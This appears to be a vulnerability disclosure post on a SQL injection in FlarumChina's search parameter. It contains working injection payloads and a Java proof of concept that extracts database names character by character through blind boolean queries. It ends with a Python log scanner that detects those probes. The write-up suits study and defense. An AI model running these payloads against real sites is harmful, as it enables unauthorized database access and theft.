First, we need to download the vulnerable program from GitHub.

Link: https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build completes, the following page is displayed:

The SQL injection vulnerability is in the search feature.

Visit the following two links and compare the responses:

(1) http://127.0.0.1/?q=1%' and 1=1 --+

(2) http://127.0.0.1/?q=1%' and 1=2 --+

Because the two requests above return different pages, we can see that this parameter is vulnerable to SQL injection.

Of course, I also wrote a script in Java to get the database name, although it is not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

When the condition is true, that is, the guessed character is correct, this request returns the normal page.

My Java program uses this request to judge each character.

Java PoC:

import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;

public class work {
    public static void main(String[] args) throws IOException {
        // Dictionary of candidate characters, one per line. "+" is the last
        // entry and acts as the end-of-name sentinel (see the checks below).
        String dictPath = "C:\\Users\\DELL\\Desktop\\superdic.txt";
        String str = null;
        // j selects the schema (LIMIT j,1); six iterations because the number
        // of databases is unknown.
        for (int j = 0; j < 6; j++) {
            String bm = String.valueOf(j);
            System.out.print(bm + ":");
            // i is the character position within the schema name.
            for (int i = 1; i < 25; i++) {
                String cs = String.valueOf(i);
                // try-with-resources closes the dictionary after every pass.
                try (BufferedReader in = new BufferedReader(new FileReader(dictPath))) {
                    while ((str = in.readLine()) != null) {
                        String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"
                                + bm + ",1)," + cs + ",1)='" + str + "'%20--+";
                        URL url;
                        try {
                            url = new URL(urlPath);
                        } catch (MalformedURLException e) {
                            System.out.println("error:" + cs);
                            continue; // skip this candidate rather than dereference a null URL
                        }
                        URLConnection conn = url.openConnection();
                        conn.setDoInput(true);
                        StringBuilder sb = new StringBuilder();
                        try (BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()))) {
                            String line;
                            while ((line = br.readLine()) != null) {
                                sb.append(line);
                            }
                        }
                        // The normal page contains this link; its presence means the
                        // condition was true, i.e. the guessed character is correct.
                        if (sb.indexOf("http://localhost/d/2") != -1) {
                            if (!"+".equals(str)) {
                                System.out.print(str);
                            }
                            break;
                        }
                    }
                }
                // "+" matched: the name has no more characters, go to the next schema.
                if ("+".equals(str)) {
                    break;
                }
            }
            System.out.print("\n");
        }
    }
}

Because I don't know how many databases there are, I loop six times for the time being.

So the fifth line returned by the script has no output.

You can also use sqlmap directly to obtain the data.

Database:

But most websites have high latency, so testing with the script is recommended.
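From the defender's side, the probes used above (the 1=1 / 1=2 page comparison and the substr() guesses against information_schema) leave a recognisable trace in the web server's access log. The following is an added example, not code from this post or from FlarumChina; it parses constructed sample log lines in common log format, decodes the q parameter the way the server does, and flags requests whose value breaks out of the string literal.

```python
# Flag boolean-based blind SQLi probes against the ?q= search parameter in web-server access
# logs. Added example for this post, not the post's or Flarum's code; the log excerpt is constructed.
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

SAMPLE_LOG = """\
10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /?q=1%25%27%20and%201=1%20--+ HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /?q=1%25%27%20and%201=2%20--+ HTTP/1.1" 200 3011
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /?q=1%25%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1)=%27f%27%20--+ HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /?q=100%25%20cotton%20--%20new HTTP/1.1" 200 4800
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d+ \d+')

# Indicators matched against the decoded q value.  Each is weak alone (a real search
# may contain "and" or "--"); a quote break followed by a boolean operator is required.
INDICATORS = {
    "quote_break":   re.compile(r"'\s*(and|or)\s+", re.I),
    "tautology":     re.compile(r"\b1\s*=\s*1\b"),
    "contradiction": re.compile(r"\b1\s*=\s*2\b"),
    "substr":        re.compile(r"\bsubstr(ing)?\s*\(", re.I),
    "info_schema":   re.compile(r"information_schema\.", re.I),
    "comment_tail":  re.compile(r"--\s*$|#\s*$"),
}

def score(q):
    """Names of the indicators that match a decoded q value."""
    return [name for name, rx in INDICATORS.items() if rx.search(q)]

def scan(log_text):
    """(ip, q, indicators) for every request whose q breaks out of the string literal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        # parse_qs undoes %XX escapes and turns '+' into a space, as the server does
        qs = parse_qs(urlparse(m["target"]).query, keep_blank_values=True) if m else {}
        found = score(qs["q"][0]) if "q" in qs else []
        if "quote_break" in found:   # "100% cotton -- new" has no quote break: not flagged
            hits.append((m["ip"], qs["q"][0], found))
    return hits

def paired_probers(hits):
    """Clients that sent both a true (1=1) and a false (1=2) condition, the comparison above."""
    seen = defaultdict(set)
    for ip, _, found in hits:
        seen[ip].update(found)
    return sorted(ip for ip, s in seen.items() if {"tautology", "contradiction"} <= s)
```

Run it over a real access log by replacing SAMPLE_LOG with the file contents; the indicator list is tuned to the payload shape shown in this post and will need widening for other encodings.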
